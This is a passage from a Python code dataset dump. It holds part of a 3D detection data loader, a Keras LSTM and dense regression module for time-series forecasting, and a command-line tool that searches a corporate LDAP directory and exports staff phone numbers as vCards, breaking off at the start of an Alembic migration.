range(3):\n leftpad = max(0,-start[i])\n rightpad = max(0,start[i]+crop_size[i]-imgs.shape[i+1])\n pad.append([leftpad,rightpad])\n crop = imgs[:,\n max(start[0],0):min(start[0] + crop_size[0],imgs.shape[1]),\n max(start[1],0):min(start[1] + crop_size[1],imgs.shape[2]),\n max(start[2],0):min(start[2] + crop_size[2],imgs.shape[3])]\n crop = np.pad(crop,pad,'constant',constant_values =self.pad_value)\n for i in range(3):\n target[i] = target[i] - start[i] \n for i in range(len(bboxes)):\n for j in range(3):\n bboxes[i][j] = bboxes[i][j] - start[j] \n \n if isScale:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n crop = zoom(crop,[1,scale,scale,scale],order=1)\n newpad = self.crop_size[0]-crop.shape[1:][0]\n if newpad<0:\n crop = crop[:,:-newpad,:-newpad,:-newpad]\n elif newpad>0:\n pad2 = [[0,0],[0,newpad],[0,newpad],[0,newpad]]\n crop = np.pad(crop,pad2,'constant',constant_values =self.pad_value)\n for i in range(4):\n target[i] = target[i]*scale\n for i in range(len(bboxes)):\n for j in range(4):\n bboxes[i][j] = bboxes[i][j]*scale\n return crop, target, bboxes, coord\n \nclass LabelMapping(object):\n def __init__(self, config, phase):\n self.stride = np.array(config['stride'])\n self.num_neg = int(config['num_neg'])\n self.th_neg = config['th_neg']\n self.anchors = np.asarray(config['anchors'])\n self.phase = phase\n if phase == 'train':\n self.th_pos = config['th_pos_train']\n elif phase == 'val':\n self.th_pos = config['th_pos_val']\n\n \n def __call__(self, input_size, target, bboxes):\n stride = self.stride\n num_neg = self.num_neg\n th_neg = self.th_neg\n anchors = self.anchors\n th_pos = self.th_pos\n \n output_size = []\n for i in range(3):\n assert(input_size[i] % stride == 0)\n output_size.append(input_size[i] / stride)\n \n label = -1 * np.ones(output_size + [len(anchors), 5], np.float32)\n offset = ((stride.astype('float')) - 1) / 2\n oz = np.arange(offset, offset + stride * (output_size[0] - 1) + 1, stride)\n oh = np.arange(offset, offset + stride * (output_size[1] - 1) + 1, stride)\n ow = np.arange(offset, offset + stride * (output_size[2] - 1) + 1, stride)\n\n for bbox in bboxes:\n for i, anchor in enumerate(anchors):\n iz, ih, iw = select_samples(bbox, anchor, th_neg, oz, oh, ow)\n label[iz, ih, iw, i, 0] = 0\n\n if self.phase == 'train' and self.num_neg > 0:\n neg_z, neg_h, neg_w, neg_a = np.where(label[:, :, :, :, 0] == -1)\n neg_idcs = random.sample(range(len(neg_z)), min(num_neg, len(neg_z)))\n neg_z, neg_h, neg_w, neg_a = neg_z[neg_idcs], neg_h[neg_idcs], neg_w[neg_idcs], neg_a[neg_idcs]\n label[:, :, :, :, 0] = 0\n label[neg_z, neg_h, neg_w, neg_a, 0] = -1\n\n if np.isnan(target[0]):\n return label\n iz, ih, iw, ia = [], [], [], []\n for i, anchor in enumerate(anchors):\n iiz, iih, iiw = select_samples(target, anchor, th_pos, oz, oh, ow)\n iz.append(iiz)\n ih.append(iih)\n iw.append(iiw)\n ia.append(i * np.ones((len(iiz),), np.int64))\n iz = np.concatenate(iz, 0)\n ih = np.concatenate(ih, 0)\n iw = np.concatenate(iw, 0)\n ia = np.concatenate(ia, 0)\n flag = True \n if len(iz) == 0:\n pos = []\n for i in range(3):\n pos.append(max(0, int(np.round((target[i] - offset) / stride))))\n idx = np.argmin(np.abs(np.log(target[3] / anchors)))\n pos.append(idx)\n flag = False\n else:\n idx = random.sample(range(len(iz)), 1)[0]\n pos = [iz[idx], ih[idx], iw[idx], ia[idx]]\n dz = (target[0] - oz[pos[0]]) / anchors[pos[3]]\n dh = (target[1] - oh[pos[1]]) / anchors[pos[3]]\n dw = (target[2] - ow[pos[2]]) / anchors[pos[3]]\n dd = np.log(target[3] / anchors[pos[3]])\n label[pos[0], pos[1], pos[2], pos[3], :] = [1, dz, dh, dw, dd]\n return label \n\ndef select_samples(bbox, anchor, th, oz, oh, ow):\n z, h, w, d = bbox\n max_overlap = min(d, anchor)\n min_overlap = np.power(max(d, anchor), 3) * th / max_overlap / max_overlap\n if min_overlap > max_overlap:\n return np.zeros((0,), np.int64), np.zeros((0,), np.int64), np.zeros((0,), np.int64)\n else:\n s = z - 0.5 * np.abs(d - anchor) - (max_overlap - min_overlap)\n e = z + 0.5 * np.abs(d - anchor) + (max_overlap - min_overlap)\n mz = np.logical_and(oz >= s, oz <= e)\n iz = np.where(mz)[0]\n \n s = h - 0.5 * np.abs(d - anchor) - (max_overlap - min_overlap)\n e = h + 0.5 * np.abs(d - anchor) + (max_overlap - min_overlap)\n mh = np.logical_and(oh >= s, oh <= e)\n ih = np.where(mh)[0]\n \n s = w - 0.5 * np.abs(d - anchor) - (max_overlap - min_overlap)\n e = w + 0.5 * np.abs(d - anchor) + (max_overlap - min_overlap)\n mw = np.logical_and(ow >= s, ow <= e)\n iw = np.where(mw)[0]\n\n if len(iz) == 0 or len(ih) == 0 or len(iw) == 0:\n return np.zeros((0,), np.int64), np.zeros((0,), np.int64), np.zeros((0,), np.int64)\n \n lz, lh, lw = len(iz), len(ih), len(iw)\n iz = iz.reshape((-1, 1, 1))\n ih = ih.reshape((1, -1, 1))\n iw = iw.reshape((1, 1, -1))\n iz = np.tile(iz, (1, lh, lw)).reshape((-1))\n ih = np.tile(ih, (lz, 1, lw)).reshape((-1))\n iw = np.tile(iw, (lz, lh, 1)).reshape((-1))\n centers = np.concatenate([\n oz[iz].reshape((-1, 1)),\n oh[ih].reshape((-1, 1)),\n ow[iw].reshape((-1, 1))], axis = 1)\n \n r0 = anchor / 2\n s0 = centers - r0\n e0 = centers + r0\n \n r1 = d / 2\n s1 = bbox[:3] - r1\n s1 = s1.reshape((1, -1))\n e1 = bbox[:3] + r1\n e1 = e1.reshape((1, -1))\n \n overlap = np.maximum(0, np.minimum(e0, e1) - np.maximum(s0, s1))\n \n intersection = overlap[:, 0] * overlap[:, 1] * overlap[:, 2]\n union = anchor * anchor * anchor + d * d * d - intersection\n\n iou = intersection / union\n\n mask = iou >= th\n #if th > 0.4:\n # if np.sum(mask) == 0:\n # print(['iou not large', iou.max()])\n # else:\n # print(['iou large', iou[mask]])\n iz = iz[mask]\n ih = ih[mask]\n iw = iw[mask]\n return iz, ih, iw\n\ndef collate(batch):\n if torch.is_tensor(batch[0]):\n return [b.unsqueeze(0) for b in batch]\n elif isinstance(batch[0], np.ndarray):\n return batch\n elif isinstance(batch[0], int):\n return torch.LongTensor(batch)\n elif isinstance(batch[0], collections.Iterable):\n transposed = zip(*batch)\n return [collate(samples) for samples in transposed]\n\n","sub_path":"training/detector/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":17665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"54665231","text":"from uin_fc_lib import ts_forecasts, ml_visualizations\nimport pandas as pd\nimport numpy as np\nimport keras as k\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom . import utils\nimport hashlib\nfrom . import fc_frame\n\nclass TF_LSTM_Regressor(object):\n def __init__(self, input_dim, validation_ratio=.3, look_back=1):\n # fix random seed for reproducibility\n self.look_back = look_back\n self.validation_ratio = validation_ratio\n seed = 7\n np.random.seed(seed)\n # evaluate model with standardized dataset\n self.input_dim = input_dim\n print(self.input_dim)\n early_stopping = EarlyStopping(monitor='val_loss', patience=5, mode='min')\n reduce_lr_loss = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, verbose=1, epsilon=1e-4,\n mode='min')\n mcp_save = ModelCheckpoint('md.hdf5', save_best_only=True, monitor='val_loss', mode='min')\n estimators = []\n #estimators.append(('standardize', StandardScaler()))\n estimators.append(('mlp', KerasRegressor(\n build_fn=self.baseline_model,\n epochs=50,\n batch_size=256,\n verbose=1,\n callbacks=[early_stopping, reduce_lr_loss], # , mcp_save],\n validation_split=self.validation_ratio\n )))\n self.pipeline = Pipeline(estimators)\n print('model compiled')\n\n # convert an array of values into a dataset matrix\n\n def baseline_model(self):\n # create and fit the LSTM network\n model = k.models.Sequential()\n model.add(k.layers.LSTM(4, input_shape=self.input_dim))\n model.add(k.layers.Dense(1))\n model.compile(loss='mean_squared_error', optimizer='adam')\n return model\n\n def predict(self, X):\n return self.pipeline.predict(X)\n\n def fit(self, X, y):\n self.pipeline.fit(X, y)\n\n\nclass TF_Regressor1(object):\n\n def __init__(self, input_dim, validation_ratio=.3):\n # fix random seed for reproducibility\n self.validation_ratio = validation_ratio\n seed = 7\n np.random.seed(seed)\n # evaluate model with standardized dataset\n self.input_dim = input_dim\n print(self.input_dim)\n early_stopping = EarlyStopping(monitor='val_loss', patience=5, mode='min')\n reduce_lr_loss = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, verbose=1, epsilon=1e-4,\n mode='min')\n mcp_save = ModelCheckpoint('md.hdf5', save_best_only=True, monitor='val_loss', mode='min')\n estimators = []\n estimators.append(('standardize', StandardScaler()))\n estimators.append(('mlp', KerasRegressor(\n build_fn=self.baseline_model,\n epochs=50,\n batch_size=128,\n verbose=1,\n callbacks=[early_stopping, reduce_lr_loss], # , mcp_save],\n validation_split=self.validation_ratio\n )))\n self.pipeline = Pipeline(estimators)\n\n def baseline_model(self):\n model = k.models.Sequential()\n model.add(k.layers.Dense(32, kernel_initializer='normal', input_dim=self.input_dim))\n model.add(k.layers.Dropout(.2))\n model.add(k.layers.Activation('relu'))\n model.add(k.layers.Dense(1, kernel_initializer='normal'))\n # also possible is mean_squared_error\n #\n\n model.compile(\n optimizer='adam',\n loss='mean_absolute_error',\n )\n return model\n\n def predict(self, X):\n return self.pipeline.predict(X)\n\n def fit(self, X, y):\n self.pipeline.fit(X, y)\n\n\ndef headline_of_X(df, hide_columns, date_column, target):\n drop_cols = hide_columns\n drop_cols.append(date_column)\n drop_cols.append(target)\n drop_cols.append('index')\n unnamed_cols = df.columns[df.columns.str.startswith('Unnamed:')]\n drop_cols.extend(unnamed_cols)\n return df.columns[~df.columns.isin(drop_cols)]\n\n\ndef train_tf_regressor1_model(\n df=None,\n date_column=None,\n backtest_settings=None,\n target=None,\n hide_columns=None,\n validation_ratio=0\n):\n if backtest_settings is None:\n backtest_settings = {}\n input_dim = len(headline_of_X(df=df, target=target, date_column=date_column, hide_columns=hide_columns))\n # subtract target\n model = TF_Regressor1(input_dim=input_dim, validation_ratio=validation_ratio)\n tfc = ts_forecasts.TFC(df=df, date_column=date_column)\n tfc.train_model(target=target, hide_columns=hide_columns, model=model, **backtest_settings)\n return tfc\n\n\n\ndef train_lstm_regressor_model(\n df=None,\n date_column=None,\n backtest_settings=None,\n target=None,\n hide_columns=None,\n validation_ratio=0.2,\n look_back=5\n):\n df.dropna(inplace=True)\n if backtest_settings is None:\n backtest_settings = {}\n if hide_columns is None:\n hide_columns = []\n input_dim = len(headline_of_X(df=df, target=target, date_column=date_column,\n hide_columns=hide_columns))\n\n print(input_dim)\n\n model = TF_LSTM_Regressor(input_dim=(input_dim, look_back),\n validation_ratio=validation_ratio)\n lstm_columns = hide_columns\n\n lstm_columns.append(target)\n lstm_columns.pop(lstm_columns.index(date_column))\n print(lstm_columns)\n X = create_LSTM_dataset(df[df.columns[~df.columns.isin(hide_columns)]],\n look_back=look_back,\n date_column=date_column)\n\n\n tfc = fc_frame.FF(df=X, date_column=date_column)\n tfc.train(\n target=target,\n hide_columns=hide_columns,\n model=model,\n **backtest_settings)\n y = df[target][look_back : ]\n #model.fit(X, y)\n return X, y, model\n\ndef get_key_for_lstm_dataset(df, date_column, look_back):\n s = df.columns.__str__() + \\\n df[df.columns[0]].__str__() + \\\n df[df.columns[-1]].__str__()\n s = s.encode('utf-8')\n s = hashlib.sha224(s).hexdigest()\n return '%s_%s_%s' % (s, date_column, look_back)\n\n\ndef create_LSTM_dataset(df, date_column, look_back=1):\n\n if not df.index.name == date_column:\n df.set_index(date_column, inplace=True)\n rm = df.ewm(halflife=100).mean()\n rstd = df.ewm(halflife=100).std()\n df = (df - rm) / rstd\n\n df.dropna(inplace=True)\n key = get_key_for_lstm_dataset(df, date_column, look_back)\n df_store = None\n df_store = utils.see_if_in_cache(key)\n if df_store is not None:\n print('processed data loaded from cache')\n return df_store\n utils.assert_date_monotonic_increasing(df=df, date_column=date_column)\n if date_column == df.index.name:\n df.reset_index(inplace=True)\n dataX = []\n for i in range(df.shape[0] - look_back + 1):\n a = df.values[i:(i + look_back), :]\n dataX.append(a)\n X = np.array(dataX)\n X = np.reshape(X, (X.shape[0], look_back, X.shape[2]))\n\n q = pd.DataFrame()\n q[date_column] = df[date_column][:df.shape[0] - look_back + 1]\n q.index.name = '__enum__'\n q.reset_index(inplace=True)\n for i, col in enumerate(df.columns):\n if col == date_column:\n continue\n q[col] = q.__enum__.map(lambda num: X[num, :, i])\n q.drop('__enum__', inplace=True, axis=1)\n q.set_index(date_column, inplace=True)\n\n n = q.values\n # reshape the Matrix such that it matches the numpy shape\n x = np.zeros((n.shape[0], n.shape[1], look_back))\n\n for i in range(n.shape[0]):\n for j in range(n.shape[1]):\n x[i, j, :] = n[i, j]\n x[i, j, :] = n[i, j]\n utils.put_in_cache(x, key)\n return x\n\n\ndef main():\n df = pd.read_csv('test_data3.csv')\n backtest_settings = {\n 'backtest_method': 'walk_forward_rolling'\n\n }\n hide_columns = ['regression_target', 'Close', 'target', 'ret_1d']\n # tfc = train_tf_regressor1_model(df=df, date_column = 'Date', target='regression_target', backtest_settings=backtest_settings, hide_columns=hide_columns)\n tfc = train_lstm_regressor_model(df=df, date_column='Date', target='regression_target',\n backtest_settings=backtest_settings, hide_columns=hide_columns)\n return tfc\n\n\n# https://machinelearningmastery.com/regression-tutorial-keras-deep-learning-library-python/\n\nif __name__ == '__main__':\n tfc = main()\n # ml_visualizations.run_graphics(tfc)\n","sub_path":"fintf/tfmodel.py","file_name":"tfmodel.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"559858424","text":"import os, sys\nimport argparse, logging, time\n\n\nimport ldap3\nfrom ldap3.core.exceptions import LDAPCursorError\n\n##############################################################\n# -\n##############################################################\ndef ParseInput():\n # =============================================\n # = Parsing\n # =============================================\n if len(sys.argv) == 1: sys.argv.append('-h')\n\n defaultFIELDS=['displayName', 'lastLogon', 'badPwdCount', 'badPasswordTime', 'company', 'postalCode', 'mobile', 'telephoneNumber', 'telefono']\n defaultMAX_ENTRIES=-1\n myParser = argparse.ArgumentParser(description='LnLdap_search is a command line tool used to query UTENZE.BANKIT.IT LDAP')\n\n userGroup = myParser.add_mutually_exclusive_group(required=True) # True indica obbligatorietà di uno del gruppo\n userGroup.add_argument('--userid',\n metavar='', required=False, default=None,\n help='[REQ] - Specify user ID [default=*]' )\n userGroup.add_argument('--username',\n metavar='', required=False, default=None,\n help='[REQ] - Specify user name')\n userGroup.add_argument('--phone',\n metavar='', required=False, default=None, type=int,\n help='[REQ] - Specify telephone number')\n\n myParser.add_argument('--max-entries', metavar='', type=int, help='[OPT] - Specify MAX entries to be processed ID (default={})'.format(defaultMAX_ENTRIES), required=False, default=defaultMAX_ENTRIES)\n myParser.add_argument('--fields', metavar='', required=False, default=defaultFIELDS, nargs='*', help='print specific field data (default: {})'.format(defaultFIELDS))\n myParser.add_argument('--vcf', action='store_true', help='create a VCF with phone data... for google contacts import')\n myParser.add_argument('--console', action='store_true', help='[OPT] - Specifies if console-log is desired')\n\n args = vars(myParser.parse_args())\n if args['phone']:\n args['fields'] = ['displayName', 'mobile', 'telephoneNumber']\n\n\n print()\n for key, val in args.items():\n print (' {:<25}: {}'.format(key, val))\n print()\n\n # sys.exit()\n return args\n\n\n\n##############################################################\n# -\n##############################################################\ndef InitLogger(CONSOLE=False):\n # =============================================\n # = Logging\n # =============================================\n LOG_DIR = 'd:/temp/log'\n LOG_FILE_NAME = 'ldap3_' + time.strftime('%Y-%m-%d_%H-%M-%S') + '.log'\n LOG_FILE_NAME = 'ldap3_' + time.strftime('%Y-%m-%d') + '.log'\n\n # set up Logger\n logFormatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\", datefmt='%Y-%m-%d %H:%M:%S')\n logFormatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\", datefmt='%H:%M:%S')\n logFormatter = logging.Formatter('[%(module)-20s:%(lineno)4d] %(levelname)-5.5s - %(message)s')\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # log to the console\n if CONSOLE:\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n logger.addHandler(consoleHandler)\n\n # also log to a file\n if not os.path.exists(LOG_DIR):\n logger.info(\"Creating log directory: {}\".format(LOG_DIR))\n os.makedirs(LOG_DIR)\n\n logFileName = '{0}/{1}'.format(LOG_DIR, LOG_FILE_NAME)\n print ('using logFile:', logFileName)\n\n fileHandler = logging.FileHandler(logFileName)\n fileHandler.setFormatter(logFormatter)\n logger.addHandler(fileHandler)\n\n return logger\n\n\n\n\n##############################################################\n# - data deve essere una LIST\n##############################################################\ndef WriteTextFile(outFname, data=[], encoding='utf-8'):\n nLines = 0\n newline = '\\n'\n f = open(outFname, \"w\", encoding=encoding)\n for line in data:\n f.write('{0}{1}'.format(line, newline))\n nLines += 1\n\n f.close()\n\n return nLines\n\n\n\n##############################################################\n# -\n##############################################################\ndef login(user_name='xxxx', bindPsw='xxxx', USE_NTLM=True):\n\n LDAP_SERVER = \"utenze.bankit.it\"\n\n # define the server\n ldapServer = ldap3.Server(LDAP_SERVER, port=389, use_ssl=False, get_info=ldap3.ALL) # define an unsecure LDAP server,\n\n\n # define the connection\n if USE_NTLM:\n domain_name = \"utenze.bankit.it\"\n conn = ldap3.Connection(ldapServer, user='{}\\\\{}'.format(domain_name, user_name), password=bindPsw, authentication=ldap3.NTLM, auto_bind=True)\n else:\n bindUser = \"CN={USERNAME},OU=Utenti_7,OU=SVI,OU=RisorseUtente,DC=utenze,DC=BANKIT,DC=IT\".format(USERNAME=user_name)\n conn = ldap3.Connection(ldapServer, user=bindUser, password=bindPsw)\n\n # perform the Bind operation\n if not conn.bind():\n print('error in bind', conn.result)\n sys.exit()\n\n return conn\n\n\n###########################################################\n#\n###########################################################\ndef createVcfCard(userDict, fDEBUG=False):\n\n print ('preparing VCF for user: {} - {}'.format(userDict['nickName'], userDict['dispName']))\n\n if fDEBUG:\n for key, val in userDict.items():\n print (' {:<25}: {}'.format(key, val))\n\n VCF = []\n VCF.append('BEGIN:VCARD')\n VCF.append('VERSION:3.0')\n # VCF.append('FN:{NAME} - (BdI)'.format(NAME=userDict['displayName']))\n VCF.append('FN:{NAME}'.format(NAME=userDict['dispName']))\n VCF.append('N:{LAST};{FIRST};;;'.format(FIRST=userDict['firtName'], LAST=userDict['lastName']))\n\n VCF.append('EMAIL;TYPE=INTERNET;TYPE=WORK:{MAIL}'.format(MAIL=str(userDict['mail']).lower()))\n\n if 'telefoni' in userDict:\n for tel in userDict['telefoni']:\n telTYPE = 'CELL' if tel.startswith('+393') else 'WORK'\n VCF.append('TEL;TYPE={TYPE}:{TEL}'.format(TYPE=telTYPE, TEL=tel))\n\n if 'nickName' in userDict: VCF.append('NICKNAME:{NICK}'.format(NICK=userDict['nickName']))\n if 'note' in userDict: VCF.append('NOTE:{NOTE}'.format(NOTE=userDict['note']))\n if 'organization' in userDict: VCF.append('ORG:{SOCIETA}'.format(SOCIETA=userDict['organization']))\n if 'titolo' in userDict: VCF.append('TITLE:{TITOLO}'.format(TITOLO=userDict['titolo']))\n\n\n\n VCF.append('END:VCARD')\n if fDEBUG:\n print()\n for line in VCF:\n print (' {:<25}'.format(line))\n\n\n return VCF\n\n\n\n\n###########################################################\n# list_generator\n###########################################################\ndef list_with_generator(conn, searchFilter=None, searchBase=None, attributes=None, MAX_ENTRIES=-1, fDEBUG=False):\n '''\n Response\n Responses are received and stored in the connection.response as a list of dictionaries. You can get the search result entries of a Search operation iterating over the response attribute. Each entry is a dictionary with the following field:\n dn: the distinguished name of the entry\n attributes: a dictionary of returned attributes and their values. Values are list. Values are in UTF-8 format\n raw_attributes: same as ‘attributes’ but not encoded (bytearray)\n '''\n\n\n if not searchBase: searchBase = \"OU=RisorseUtente,dc=utenze,dc=bankit,dc=it\"\n if not attributes: attributes = [ldap3.ALL_ATTRIBUTES, ldap3.ALL_OPERATIONAL_ATTRIBUTES]\n if not searchFilter: searchFilter = '(objectclass=person)'\n\n # paged search wrapped in a generator and return dictionary datatype\n\n entry_generator = conn.extend.standard.paged_search(search_base = searchBase,\n search_filter = searchFilter,\n search_scope = ldap3.SUBTREE,\n attributes = attributes,\n paged_size = 5,\n generator = True)\n\n counter = 0\n myENTRIES = []\n\n # ogni entry è un dictionary\n fDEBUG = False\n STEP = 100\n for entry in entry_generator:\n DN = entry['dn']\n if fDEBUG:\n print(type(entry), type(DN), DN)\n\n counter += 1\n if not counter%STEP:\n print ('[{:5}] - processing DN: {}'.format(counter, DN))\n\n myENTRIES.append(entry)\n\n if counter == MAX_ENTRIES:\n break\n\n print('Total entries retrieved:', counter)\n return myENTRIES\n\n\n\n###########################################################\n#\n###########################################################\ndef getPhoneNumbers_OLD(conn, MAX_ENTRIES=-1, fDEBUG=False):\n searchBase = \"OU=RisorseUtente,dc=utenze,dc=bankit,dc=it\"\n attributes = [ldap3.ALL_ATTRIBUTES, ldap3.ALL_OPERATIONAL_ATTRIBUTES]\n\n ''' # potrebbe dare errore se l'attributo non esiste\n attributes = [ 'distinguishedName',\n 'sAMAccountName',\n 'displayName',\n 'company',\n 'otherTelephone',\n 'telefono',\n 'postalCode'\n ]\n '''\n searchFilter = '(objectclass=person)'\n\n\n myLIST = list_with_generator(conn, searchFilter=searchFilter, searchBase=searchBase, attributes=attributes, MAX_ENTRIES=MAX_ENTRIES)\n\n\n myValidREC = []\n nEntry = 0\n for entry in myLIST:\n\n DN = entry['dn']\n attr = entry['attributes']\n raw_attr = entry['raw_attributes']\n\n nEntry += 1\n logger.info('[{:05}] - DN = {}'.format(nEntry, DN))\n rec = entryValidation(entry)\n if not rec == {} and not rec['telefoni'] == []:\n myValidREC.append(rec)\n\n return myValidREC\n\n\n\n##############################################################\n# -\n##############################################################\ndef getUserEntry(conn, userID='*', userName=None, phone=None, MAX_ENTRIES=-1):\n\n searchBase = \"OU=RisorseUtente,dc=utenze,dc=bankit,dc=it\"\n attributes = [ldap3.ALL_ATTRIBUTES, ldap3.ALL_OPERATIONAL_ATTRIBUTES]\n\n if userName:\n\n # non funziona bene....\n searchFilter = '''(&\n (objectClass=person)\n (|\n (displayName=*{NAME})\n (displayName={NAME}*)\n )\n )'''.format(NAME=userName)\n\n # sembra OK....\n searchFilter = '''(&\n (objectclass=person)\n (displayName=*{NAME}*)\n )'''.format(NAME=userName)\n\n elif userID == 'all':\n searchFilter = '(objectclass=person)'\n\n elif phone:\n searchFilter = '''(&\n (objectClass=person)\n (|\n (telephoneNumber=*{PHONE}*)\n (mobile=*{PHONE}*)\n )\n )'''.format(PHONE=phone)\n\n # (telefono=*{PHONE}*)\n else:\n searchFilter = '(&(objectclass=person)(cn={CN}))'.format(CN=userID)\n\n\n myLIST = list_with_generator(conn, searchFilter=searchFilter, searchBase=searchBase, attributes=attributes, MAX_ENTRIES=MAX_ENTRIES)\n # found = conn.search(baseSearch, search_scope=ldap3.SUBTREE, search_filter=criteria, attributes=attributes)\n\n\n myValidREC = []\n nEntry = 0\n for entry in myLIST:\n DN = entry['dn']\n attr = entry['attributes']\n raw_attr = entry['raw_attributes']\n\n nEntry += 1\n\n logger.info('[{:05}] - DN = {}'.format(nEntry, DN))\n # controllo dei campi necessari ad individuare uno user\n isValid = entryValidation(entry, attributes=['displayName', 'sAMAccountName'])\n if isValid:\n myValidREC.append(entry)\n\n return myValidREC\n\n\n\n############################################################\n#\n############################################################\ndef entryValidation(entry, attributes=[], fDEBUG=False):\n assert type(entry) == dict\n if attributes == []:\n attributes = ['displayName', 'sAMAccountName']\n\n eAttr = entry['attributes']\n\n if fDEBUG:\n print()\n for key, val in eAttr.items():\n print ('{:<25} : {}'.format(key, val))\n\n try:\n for attr in attributes:\n value = eAttr[attr]\n\n except (Exception) as why:\n logger.info(' skipping... due to a missing attribute: {}'.format(str(why)))\n return False\n\n if 'computer' in eAttr['objectClass']:\n logger.info(' skipping... due to computer class')\n return False\n\n elif 'person' not in eAttr['objectClass']:\n logger.info(' skipping... not person class')\n return False\n\n return True\n\n\n############################################################\n#\n############################################################\ndef getPhoneNumbers(entry, fDEBUG=False):\n assert type(entry) == dict\n\n DN = entry['dn']\n eAttr = entry['attributes']\n\n if fDEBUG:\n print()\n for key, val in eAttr.items():\n print ('{:<25} : {}'.format(key, val))\n\n myRec = {} # return Record\n\n\n isValid = entryValidation(entry, attributes=['displayName', 'sAMAccountName', 'mail'])\n if isValid == False:\n return myRec\n\n if 'company' in eAttr and eAttr['company'] == 'PERSONALE ESTERNO':\n logger.info(' skipping... external user')\n return myRec\n\n # ---------- Record is vaildated\n\n dispName = eAttr['displayName']\n sAMA = eAttr['sAMAccountName']\n mail = eAttr['mail']\n\n if ' - ' in dispName:\n dispName, notes = dispName.split(' - ', 1)\n else:\n notes = ''\n\n logger.info(' displayName : {}'.format(dispName))\n logger.info(' sAMAccountName : {}'.format(sAMA))\n\n nameTokens = dispName.split()\n\n if len(nameTokens) == 2:\n firtsName, lastName = dispName.split()\n\n elif len(nameTokens) == 3:\n firtsName, middleName, lastName = dispName.split()\n\n if middleName.lower() in ['di', 'delle', 'della', 'degli', 'de']:\n lastName = '{} {}'.format(middleName, lastName)\n\n elif middleName.lower() in ['d']:\n lastName = \"d'{}\".format(lastName)\n dispName = dispName.replace(' ' + middleName + ' ', ' ' + middleName + \"'\")\n\n else:\n firtsName = '{} {}'.format(firtsName, middleName)\n\n elif len(nameTokens) > 3:\n firtsName, middleName, lastName = dispName.rsplit(' ', 2)\n lastName = '{} {}'.format(middleName, lastName)\n\n\n else:\n firtsName = dispName\n lastName = ''\n\n\n if fDEBUG: print ('processing DN:', DN)\n\n # - ricerca dei numeri di telefono\n telephoneAttributes = ['telephoneNumber', 'telefono', 'otherTelephone', 'mobile']\n telefoni = []\n for attrName in telephoneAttributes:\n if not attrName in eAttr: continue\n _tel = eAttr[attrName]\n if isinstance(_tel, str):\n _tel = [_tel]\n\n for oTel in _tel:\n if oTel.startswith('2'):\n intenalTel = '+39064792' + oTel[1:]\n if intenalTel in telefoni:\n telefoni.remove(intenalTel)\n telefoni.append('+39 06 4792 ' + oTel[1:])\n telefoni.append('+39 06 9468 ' + oTel ) # telefono in uscita mantiene il 2 iniziale\n\n else:\n telefoni.append(oTel ) # telefono in uscita mantiene il 2 iniziale\n\n\n if telefoni == []:\n return {}\n\n myRec['DN'] = DN\n myRec['firtName'] = firtsName\n myRec['lastName'] = lastName\n myRec['nickName'] = sAMA\n myRec['telefoni'] = telefoni\n myRec['dispName'] = dispName\n myRec['organization'] = 'BdI'\n\n # contiene il grado dell'utente\n\n if 'postalCode' in eAttr:\n # myRec['note'] += 'grado\\\\: {}'.format(eAttr['postalCode'].title()) # camel Case\n myRec['titolo'] = eAttr['postalCode'].title()\n\n\n if notes:\n myRec['note'] = ' - {}'.format(notes)\n\n # voci = ['telefono', 'telefono01', 'telefono02', 'displayName', 'mail']\n voci = ['mail']\n for voce in voci:\n if voce in eAttr: myRec[voce] = eAttr[voce]\n\n if fDEBUG:\n for key, val in myRec.items():\n print (' {:<25}: {}'.format(key, val))\n\n return myRec\n\n\n\n\nif __name__ == '__main__':\n # le variabili definite qui sono automaticamente globali.\n inpArgs = ParseInput()\n logger = InitLogger(CONSOLE=inpArgs['console'])\n if not inpArgs['userid']: userID = os.getlogin()\n\n conn = login(user_name=\"xxxx\", bindPsw=\"yyyy\", USE_NTLM=True)\n\n entryLIST = getUserEntry(conn, userID=inpArgs['userid'], phone=inpArgs['phone'], userName=inpArgs['username'], MAX_ENTRIES=inpArgs['max_entries'])\n conn.unbind()\n\n nUser = 0\n\n # per creare un file VCf da dare in input a gmail contacts\n if inpArgs['vcf']:\n myVcfList = []\n print()\n for entry in entryLIST:\n rec = getPhoneNumbers(entry)\n if rec:\n vcf = createVcfCard(rec)\n myVcfList.extend(vcf)\n myVcfList.append('')\n nUser += 1\n\n outFile = 'd:\\\\temp\\\\google-bdi.vcf'\n nLines = WriteTextFile(outFname=outFile, data=myVcfList, encoding='utf-8')\n print ('''total processed Users: {}\n {} lines have been written to file: {}'''.format(nUser, nLines, outFile))\n\n # display di alcuni campi\n elif inpArgs['fields']:\n for entry in entryLIST:\n DN = entry['dn']\n attr = entry['attributes']\n raw_attr = entry['raw_attributes']\n print ()\n # print (DN)\n\n print(' {:<25}: {} - {}'.format(attr['displayName'], attr['sAMAccountName'], DN))\n\n reqFields = [item.lower() for item in inpArgs['fields'] ]\n for attrName in attr.keys():\n if attrName.lower() in reqFields:\n val = attr[attrName]\n if isinstance(val, list):\n print (' {:<25}:'.format(attrName))\n for item in val:\n print (' '*30, item)\n\n else:\n print (' {:<25}: {}'.format(attrName, attr[attrName]))\n\n\n\n","sub_path":"Ldap3/LnLdapSearch.py","file_name":"LnLdapSearch.py","file_ext":"py","file_size_in_byte":18883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"543299166","text":"\"\"\"empty message\n\nRevision ID: b4350943a906\nRevises: e412490c2bd4\nCreate Date: 2016-04-23 09:04:13.588568\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'b4350943a906'\ndown_revision = 